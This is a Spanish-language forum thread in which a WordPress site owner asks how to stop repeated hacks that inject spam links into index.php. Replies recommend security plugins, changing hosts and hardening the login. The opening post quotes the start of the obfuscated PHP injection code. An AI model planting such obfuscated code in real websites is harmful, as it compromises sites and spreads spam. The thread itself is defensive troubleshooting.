Cómo detener hackeos constantes en blog Wordpress

  • Autor Autor NoLimits
  • Fecha de inicio Fecha de inicio
NoLimits

NoLimits

Épsilon
SEO
Verificación en dos pasos activada
Hola amigos,

Durante la ultima semana mi blog ha sido victima de constantes hackeos. Ya descubrí qué es lo que hacen pero no sé como evitarlo.

Modifican el archivo index.php añadiendo algo así:

Insertar CODE, HTML o PHP:
<?php
$f8de0e = "5c098e1a2f8de0e1eb6618748fee7214";
header('Content-Type:text/html; charset=utf-8');
$O0__0O_O0O='oenme8776';
$OO0O0__0_O=14683;
$O0O0__O0_O='index.php/BC/Sy65Jk/D-YnJ6xHR_hqrxq_eskghre_ntpnumv.gn.jj';
$O___OO000O=1;
$O0_0O_OO0_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");

Son cientos de líneas las que agregan y Google empieza a detectar miles de enlaces basura por lo que tengo que estar revisando y para solucionarlo reinstalo wordpress pero al poco tiempo vuelven a modificar el archivo.

Ya instale WP Security, modifique el archivo .htaccess, ajuste los permisos de escritura, cambie contraseñas. No sé que más puedo hacer y por eso acudo a ustedes esperando que puedan ayudarme. 😕

Saludos
 
Hola [MENTION=4446]NoLimits[/MENTION]

Te recomiendo cambiar de hosting. Además pon al hosting al tanto de este problema y que bloqueen el acceso de esa IP (pero pueden ser varias).

También te recomiendo cambiar contraseñas, ocultar el enlace de ingreso al login (incluso eliminarlo si lo crees necesario).

Revisa que themes y plugins estén actualizados y que no estés usando nada no comprado legalmente.

Cambia el plugin de protección por Wordfence y déjalo por ahora en modo "estoy recbiendo un ataque" para que el cortafuegos sea más agresivo.

También puedes probar con Incapsula o CloudFlare (tienen opciones gratis).

- - - Actualizado - - -

Este plugin es nuevo y creará una nueva dirección para el login con 2 palabras clave y además desactivará XMLRPC que es conocido por ser algo vulnerable (se usa para enviar pings y otras comunicaciones que ya nadie usa hoy día).

WP Login Door — WordPress Plugins
https://wordpress.org/plugins/wp-login-door/
 
Yo añadiría: usa Wordfence para comprobar qué archivos han cambiado respecto a los del repositorio y usa Sucuri para una limpieza post-hackeo. En este artículo explico el proceso estándar a seguir después de un hackeo en WordPress: Recuperar un WordPress hackeado - Enrique J. Ros
 
Hola [MENTION=4446]NoLimits[/MENTION]

Te recomiendo cambiar de hosting. Además pon al hosting al tanto de este problema y que bloqueen el acceso de esa IP (pero pueden ser varias).

También te recomiendo cambiar contraseñas, ocultar el enlace de ingreso al login (incluso eliminarlo si lo crees necesario).

Revisa que themes y plugins estén actualizados y que no estés usando nada no comprado legalmente.

Cambia el plugin de protección por Wordfence y déjalo por ahora en modo "estoy recbiendo un ataque" para que el cortafuegos sea más agresivo.

También puedes probar con Incapsula o CloudFlare (tienen opciones gratis).

- - - Actualizado - - -

Este plugin es nuevo y creará una nueva dirección para el login con 2 palabras clave y además desactivará XMLRPC que es conocido por ser algo vulnerable (se usa para enviar pings y otras comunicaciones que ya nadie usa hoy día).

WP Login Door — WordPress Plugins
https://wordpress.org/plugins/wp-login-door/


Yo añadiría: usa Wordfence para comprobar qué archivos han cambiado respecto a los del repositorio y usa Sucuri para una limpieza post-hackeo. En este artículo explico el proceso estándar a seguir después de un hackeo en WordPress: Recuperar un WordPress hackeado - Enrique J. Ros

Muchas gracias a ambos por la recomendación, instale el plugin Wordfence y realice un análisis con el cual logre encontrar un archivo php escondido dentro del directorio /js :s el cual tenia código malicioso.

Ahora que lo eliminé, todo va bien 😛7:

Saludos :encouragement:
 
Recomiendo que contrates un programador que te re instale el Wordpress y te revise por donde entraron y te parchee el bug.

Saludos
 
Saludos, te recomiendo que cambies de Host, ya que podrías ser víctima de algún Shell inyectado en el, así te evitas problemas futuros.
 
Lo más probable es que no sea el host, la mayoría de las veces es una vulnerabilidad de un script tuyo. Y cuando te la explotaron te instalaron puertas traseras

Saludos
 
Si tienes acceso a la consola te recomiendo que ejecutes los comandos que salen en este post para ver si estas enviando mucho correo de spam desde tu wordpress
Como evitar que nuestro wodpress envie correos de spam | Webnivel
Si puedes también indicanos que panel o como tienes configurado el servidor, este tipo de hackeos los he tenido por un plugin con un bug pero algunos paneles o configuraciones son menos propensas.
Por lo que veo en tu código y unido al otro que encontraste están ejecutando código a través del metodo POST, lo que puedes hacer es mediante el archivo htaccess bloquearlo y así nadie podrá loguearse ni ejecutar código (ni si quiera tu) pero la web seguirá funcionando.
 
Atrás
Arriba